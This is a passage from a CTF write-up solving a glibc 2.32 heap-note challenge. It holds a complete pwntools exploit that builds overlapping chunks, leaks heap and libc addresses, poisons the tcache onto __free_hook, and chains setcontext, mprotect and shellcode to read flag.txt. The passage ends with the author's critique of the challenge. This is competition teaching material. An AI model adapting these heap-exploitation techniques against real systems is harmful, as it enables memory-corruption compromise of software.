# need it to call setcontext + 61 and then stack pivot onto our heap, poprdi written afterwards due to push rcx, and rcx derives its value from [rdx + 0xa8] | |
payload = (p64(0) + p64(heapbase + 0x2410) + p64(0) * 2 + p64(libc.symbols['setcontext'] + 61) + p64(poprdi) + p64(heapbase) + p64(poprsi) + p64(0x5000) + p64(poprdx) + p64(7) + p64(libc.symbols['mprotect']) + p64(heapbase + 0x2920 + 0x10)).ljust(0xa0, '\x00') + p64(heapbase + 0x2410 + 0x30) + p64(poprdi) | |
alloc(0x500, payload) # 7, have to avoid other larger chunks cause they might be seen as tcache and get pointers inside since i spammed heap | |
alloc(0x500, 'flag.txt'.ljust(0x10, '\x00') + shellcode) | |
free(7) | |
context.log_level='debug' | |
print p.recvall() |
Final Exploit:
Do note that in this writeup, I nop'd out the sleep for the sake of local testing. However, running it with the provided ynetd binary (as the CTF server is no longer up) with a 3 second timeout for each option added onto my script still had it over 10 minutes under the sigalarm limit, so it should have been fine during the actual competition scenario.
from pwn import * | |
elf = ELF('./challenge') | |
libc = ELF('./libc.so.6') # 2.32 | |
p = remote('localhost', 1337) | |
def wait(): | |
p.recvrepeat(0.1) | |
def alloc(size, data, line=True): | |
assert(size > 0x100 and size <= 0x2000) | |
if len(data) == size: | |
line = False | |
wait() | |
p.sendline('1') | |
wait() | |
p.send(str(size)) | |
wait() | |
if line: | |
p.sendline(data) | |
else: | |
p.send(data) | |
def free(idx): | |
wait() | |
p.sendline('2') | |
wait() | |
p.sendline(str(idx)) | |
def leak(idx): | |
wait() | |
p.sendline('3') | |
wait() | |
p.sendline(str(idx)) | |
def edit(idx, data, line=True): | |
wait() | |
p.sendline('4') | |
wait() | |
p.sendline(str(idx)) | |
wait() | |
if line: | |
p.sendline(data) | |
else: | |
p.send(data) | |
alloc(0x438, 'A' * 0x438) # 0 | |
alloc(0x448, 'B' * 8) # 1, leave fd_nextsize part be null if target to backward consolidate onto is of large size | |
alloc(0x108, 'test') # 2 | |
alloc(0x438, 'C' * 0x438) # 3, smaller than B | |
alloc(0x108, 'test') # 4 | |
alloc(0x418, 'D' * 0x418) # 5 | |
alloc(0x458, 'E' * 0x458) # 6, bigger than B | |
alloc(0x108, 'test') # 7 | |
free(1) | |
free(3) | |
free(6) | |
alloc(0x500, 'test') # 1, trigger largebin allocation, because of different sizes, we'll have 2 sets of pointer in each chunk in largebin | |
free(0) # backwards consolidate to help us start forging size, this goes to unsorted now from largebin, also have largebin pointers now from the chunk it coalesced from | |
alloc(0x438 + 0x30, 'A' * 0x448 + p64(0x2151)[:-1]) # 0, to help forge chunk header | |
alloc(0x448-0x30, 'B' * (0x448-0x30)) # 3, clear our unsorted bin, also very important because this will be linked into the unsorted chain to help us with the dangling pointer partial overwrite | |
# 0, 1, 2, 3, 4, 5, 7 | |
# now recover large bins and bring stuff back into unsorted | |
alloc(0x438, 'C' * 0x438) # 6 | |
alloc(0x458, 'E' * 0x458) # 8 | |
# 0, 1, 2, 3, 4, 5, 6, 7, 8 | |
free(6) # unsorted chain | |
free(3) | |
free(8) | |
free(5) # coalesce in unsorted to get leftover pointers | |
# 0, 1, 2, 4, 7 | |
# with unlink, 3 and end of 5 will be getting heap pointers (but 5 will have nulls in front because of forged size metadata) | |
alloc(0x438, 'C' * 8) # 3, fix the fd pointer, pulling back from unsorted | |
alloc(0x418 + 0x20, 'D' * (0x418) + p64(0x461)) # 5, fix the bk pointer, pulling from the one I coalesced, sorts an unsorted chunk to largebin | |
# 0, 1, 2, 3, 4, 5, 7 | |
# at this point we have an unsorted and largebin, let's clean up the unsorted and largebin | |
alloc(0x430, 'test') # 6 | |
alloc(0x410, 'test') # 8 | |
alloc(0x808, 'G' * 0x808) # 9 | |
alloc(0x4f8, 'H' * 0x4f8) # 10 | |
alloc(0x468, 'temp') # 11 | |
# for stashing into tcache (since tcache won't get wiped unless we call malloc in this program) | |
alloc(0x108, 'stash') # 12 | |
alloc(0x108, 'stash') # 13 | |
alloc(0x108, 'stash') # 14 | |
alloc(0x108, 'stash' + '\x00' * 3 + p64(0) + (p64(0) + p64(0x21)) * 13) # 15, for the later 0x1510 fake chunk that i will free to tcache poison | |
alloc(0x108, 'stash') # 16 | |
alloc(0x108, 'stash') # 17 | |
alloc(0x108, 'temp') # 18, so no back coalescing later when we send 17 to unsorted | |
free(18) | |
edit(9, (p64(0) + p64(0x21)) * (0x800 / 16) + p64(0x2150), line=False) | |
# back coalesce | |
free(10) | |
log.info("achieved backwards coalesce") | |
# 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17 | |
# everything from 0 - 9 is overlapped | |
leak(3) | |
heapbase = u64(p.recv(14)[8:].ljust(8, '\x00')) - 0x15c0 | |
log.info('heap base: 0x%x' % heapbase) | |
# libc 2.32 has null ending for main arena + 96 libc address | |
alloc(0xa90, p64(0) * 3 + p64(0x421)) # 10, should align right over index 5, fix size of index 8 | |
alloc(0x2000, 'test') # 18 send unsorted chunk into largebin, get largebin pointers into index 5 | |
leak(5) | |
libcleak = u64(p.recv(6).ljust(8, '\x00')) | |
libc.address = libcleak - 0x1bf270 | |
log.info('libc base: 0x%x' % libc.address) | |
free(18) | |
free(10) # go back up | |
# fixing index 5 size | |
alloc(0x670, 'test') # 10 | |
alloc(0x430, (p64(0) + p64(0x21)) * (0x410 / 16) + p64(0) + p64(0x441)) # 18 | |
# recoalesce it up | |
free(18) | |
free(10) | |
alloc(0x108, p64(0) * 2 + (p64(0) + p64(0x21))*5) # 10, fix size of index 8 | |
# 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17 | |
# now we need to get stuff into tcache to be able to tcache poison, but they keep clearing tcache | |
# so tcache stash unlink onto malloc_par's tcache_max_byte | |
# but to do tcache stash unlink, we technically need to stash 6 chunks into tcache and 2 chunks into smallbin, and then modify bk of last chunk getting stashed | |
# here, tcache is wiped everytime we call malloc so that won't work... so we need 15 chunks of the same time, to all free and then move the latter 8 to smallbin, and then overwrite bk of last one to stash | |
# we have 0x108 in 12, 13, 14, 15, 16, 17, 2, 4, 7, 10 as of now need 5 more | |
''' | |
0x56494efda520: 0x000056494fd352c0 0x000056494fd36b40 S | |
0x56494efda530: 0x000056494fd35b50 X 0x000056494fd35c60 | |
0x56494efda540: 0x000056494fd360a0 X 0x000056494fd361b0 | |
0x56494efda550: 0x000056494fd365f0 S 0x000056494fd36a30 X | |
0x56494efda560: 0x000056494fd35730 0x000056494fd37050 S | |
0x56494efda570: 0x000056494fd35710 X 0x000056494fd37d60 | |
0x56494efda580: 0x000056494fd381d0 X 0x000056494fd382e0 X | |
0x56494efda590: 0x000056494fd383f0 X 0x000056494fd38500 X | |
0x56494efda5a0: 0x000056494fd38610 X 0x000056494fd38720 X | |
0x56494efda5b0: 0x0000000000000000 | |
0x56494fd37d50 is the cutoff of the massive unsorted chunk at this point | |
from here, looks like a good choice to save index 9, 1, and 6 (so one for tcache poison, one for bk overwrite, and the other just for padding/backup purposes (also don't want an extra unsorted chunk) | |
so we will free 0 3 5 8 11 and have free slots 0 3 5 8 11 18, we can use one of these to help as pad | |
however freeing some of these directly is bad as it creates a messy unsorted chain, better to do the allocate 2 chunks, recoalesce back trick to make our target chunks to be freed 0x21 | |
''' | |
# coalesce 11 into big unsorted | |
free(11) | |
# fix index 3, remember to fix the 0x111 metadata issue (for 2, 4, 7), but we can repair this later | |
alloc(0x480, (p64(0) + p64(0x21)) * (0x430 / 16) + (p64(0) + p64(0x21)) * 5) # 11 | |
free(11) | |
free(3) | |
# fix index 5 | |
alloc(0x900, '\x00') # 3 | |
alloc(0x430, (p64(0) + p64(0x21)) * (0x80 / 2) + (p64(0) + p64(0x21)) * 10) # 11 | |
free(11) | |
free(3) | |
free(5) | |
# free index 8 now too, could have been done earlier | |
free(8) | |
# fix index 9 to size metadata 0x1511 for potential tcache poison | |
alloc(0x17f0, '\x00') # 3 | |
alloc(0x430, (p64(0) + p64(0x21)) * 2 + p64(0) + p64(0x1511)) # 5, around size 0x1420~0x1430ish to escape the memset on tcache_perthread_struct | |
free(5) | |
free(3) | |
# repair the 0x111 size for 2, 4, 7 (7 is still clean, so it's good) note how among 1, 6, 9, only 6 is before one of the 0x110 chunks? use 6 for the bk overwrite | |
alloc(0x820, (p64(0) + p64(0x21)) * (0x320 / 16) + p64(0) + p64(0x111)) # 3 | |
alloc(0x450, (p64(0) + p64(0x21)) * 4 + p64(0) + p64(0x111)) # 5 | |
free(5) | |
free(3) | |
log.info('hopefully cleaned up heap') | |
# get another unsorted | |
free(0) | |
# empty are 0 3 5 8 11 18, until the newly added unsorted bin from freeing 0 runs out, the large chunk will be in largebin, but then will move back to unsorted since the new unsorted can't support all 5 allocations | |
alloc(0x108, 'stash') # 0 | |
alloc(0x108, 'stash') # 3 | |
alloc(0x138, 'stash') # 5 (otherwise metadata for 10 gets overwritten) | |
free(5) | |
alloc(0x108, 'temp') # 5 | |
alloc(0x108, 'stash') # 8 | |
# now allocate a big one so next one can overlap with 6 | |
alloc(0xd10, '\x00') # 11 | |
alloc(0x108, 'stash') # 18 | |
free(5) | |
alloc(0x108, 'stash') # 5, free this one early on so it goes into tcache, and helps prevents 18 from consolidating with unsorted | |
# now we finally have 15 of these 0x110 chunks, we need the one in 18 to be the last in smallbin | |
''' | |
0x563e099eb520: 0x0000563e09b562c0 X 0x0000563e09b57b40 | |
0x563e099eb530: 0x0000563e09b56b50 X 0x0000563e09b563d0 X | |
0x563e099eb540: 0x0000563e09b570a0 X 0x0000563e09b57760 X | |
0x563e099eb550: 0x0000563e09b575f0 0x0000563e09b57a30 X | |
0x563e099eb560: 0x0000563e09b56820 X 0x0000563e09b58050 | |
0x563e099eb570: 0x0000563e09b56710 X 0x0000563e09b56930 | |
0x563e099eb580: 0x0000563e09b591d0 X 0x0000563e09b592e0 X | |
0x563e099eb590: 0x0000563e09b593f0 X 0x0000563e09b59500 X | |
0x563e099eb5a0: 0x0000563e09b59610 X 0x0000563e09b59720 X | |
0x563e099eb5b0: 0x0000563e09b57650 X 0x0000000000000000 | |
0, 2, 3, 4, 5, 7, 8, 10, 12, 13, 14, 15, 16, 17, 18 | |
12 to 17 is a chain, (12 will back coalesce), 0, 3 is a chain, 8, 10 is a chain, 5 is on top of unsorted, 7 is under a potential new unsorted (so will coalesce with the smallbin and move to unsorted), 18 needs to be the last one inserted, 2, 4 are isolated | |
so let's do the following free order: 14, 16, 3, 10, 5, 12, 7 (tcache filled, now into unsorted), 17, 2, 13, 15, 0, 8, 4, 18 | |
''' | |
free(14) | |
free(16) | |
free(3) | |
free(10) | |
free(5) | |
free(12) | |
free(7) | |
free(17) | |
free(2) | |
free(13) | |
free(15) | |
free(0) | |
free(8) | |
free(4) | |
free(18) | |
# only 1, 6, 9, 11 still left | |
alloc(0x450, '\x00') # 0, trigger movement from unsorted chain to smallbin for the 0x110 chunks | |
free(0) | |
free(6) | |
payload = (p64(0) + p64(0x21)) * 5 + p64(0) + p64(0x110) + p64(heapbase + 0x1090) + p64(libc.symbols['mp_'] + 80 - 0x10) # overwrite .tcache_bins | |
alloc(0x430, payload) # 0, overlap smallbin 0x110 head's chunk | |
alloc(0x108, '\x00') # 2, trigger smallbin stash unlink | |
log.info('tcache stash unlinked, overwrote mp_.tcache_bin') | |
# can't touch 0x110 smallbin ever again | |
# 0, 1, 2, 9, 11, use 9 as the target for tcache poison, 1 was leftover but doesn't matter really (was a mistake on my part, but good that i still saved as a backup) | |
alloc(0x780, '\x00') # 3 | |
alloc(0x1500, p64(0) * 4 + 'fizzbuzz') # 4 | |
free(4) | |
free(9) # created tcache chain | |
malicious_addr = ((heapbase + 0x2050) >> 12) ^ libc.symbols['__free_hook'] | |
alloc(0x400, p64(0) * 9 + p64(0x1511) + p64(malicious_addr)[:-1]) # 4, tcache poison | |
super_gadget = libc.address + 0x00000000001296b0 #: mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20]; | |
poprsi = libc.address + 0x00000000000ba607#: pop rsi; ret; | |
poprdx = libc.address + 0x0000000000089972#: pop rdx; ret; | |
poprdi = libc.address + 0x0000000000027b26 #: pop rdi; ret; | |
alloc(0x1500, '\x00') # 5 | |
alloc(0x1500, p64(super_gadget)) # 6 | |
log.info('tcache poisoned onto __free_hook, overwriting with super gadget at 0x%x' % super_gadget) | |
context(arch='amd64') | |
shellcode = ''' | |
mov rax, 2 | |
mov rdi, %s | |
xor rsi, rsi | |
xor rdx, rdx | |
syscall | |
mov rsi, rdi | |
sub rsi, 0x100 | |
xchg rdi, rax | |
xor rax, rax | |
mov dl, 100 | |
syscall | |
xor rax, rax | |
mov al, 1 | |
mov rdi, 1 | |
syscall | |
mov al, 60 | |
xor rdi, rdi | |
syscall | |
'''% int(heapbase + 0x2920) | |
shellcode = asm(shellcode) | |
# need it to call setcontext + 61 and then stack pivot onto our heap, poprdi written afterwards due to push rcx, and rcx derives its value from [rdx + 0xa8] | |
payload = (p64(0) + p64(heapbase + 0x2410) + p64(0) * 2 + p64(libc.symbols['setcontext'] + 61) + p64(poprdi) + p64(heapbase) + p64(poprsi) + p64(0x5000) + p64(poprdx) + p64(7) + p64(libc.symbols['mprotect']) + p64(heapbase + 0x2920 + 0x10)).ljust(0xa0, '\x00') + p64(heapbase + 0x2410 + 0x30) + p64(poprdi) | |
alloc(0x500, payload) # 7, have to avoid other larger chunks cause they might be seen as tcache and get pointers inside since i spammed heap | |
alloc(0x500, 'flag.txt'.ljust(0x10, '\x00') + shellcode) | |
free(7) | |
context.log_level='debug' | |
print p.recvall() |
Concluding thoughts:
While this challenge was overall pretty decent as it showed some up to date glibc tricks, I felt that some of the elements were unnecessary and added artificial difficulty. This challenge could have been just as difficult conceptually if it allowed for 2-3 more allocation spots (rather than force players who have the correct plans to rewrite their exploit several times), and combining a sigalarm with a 2 second sleep in the main menu didn't add any value. Additionally, while the custom patch made in this libc makes sense and did contribute to overall quality, I do see libc patching happening more often and hope CTF authors do not abuse it to create extremely contrived heap note problems.
Feel free to let me know if I made any mistakes in my explanations (as this problem was quite complex), congrats to Poortho for taking first blood, and thanks again to all those teammates that worked with me in DiceGang, which placed 4th overall!